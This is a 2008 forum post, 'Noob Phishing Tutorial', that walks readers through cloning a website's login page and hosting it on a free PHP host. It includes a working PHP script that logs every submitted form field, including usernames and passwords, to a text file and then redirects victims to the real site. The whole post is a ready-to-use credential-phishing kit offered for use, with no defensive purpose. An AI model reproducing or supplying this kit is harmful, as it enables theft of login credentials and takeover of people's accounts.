ChainReaction
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Noob Phishing Tutorial

Go down

Noob Phishing Tutorial Empty Noob Phishing Tutorial

Post by gheli Tue Jul 22, 2008 9:41 pm

The first thing you want to do in order to create your phisher, is go to the website you want to make the phisher for. once your there, right click anywhere on the website, and choose view source. Then hit Ctrl+A and then open a notepad document and press Ctrl+V. Then, press Ctrl+F and type "action" (without quotes). there might only be one action or there might be two or three. you might have to experiment to find the right one, or you might have to use all of them, or maybe a combination of two. its different for many websites. It should come up with things that say action= then something else after that. if there are a few words inside ' or " then, leave those there. if there aren't any, then don't put any. type "post.php" (without quotes) instead of whatever was after action=. save that as index.html. next, open notepad again and copy and paste this.

header ('Location: WEBSITE URL HERE ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

obviously, where it says WEBSITE URL HERE, you want to copy and paste the website URL that you want to make your phisher for. save that as post.php.

Next, make a file called log.txt and leave it blank. save it.

then go to 110mb.com or a different web host that allows php. upload all three files, and when someone tries to log in to your phisher, it will record the username and password that they used in log.txt

Thanks for reading!!!

gheli

Posts : 20
Join date : 2008-07-22

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum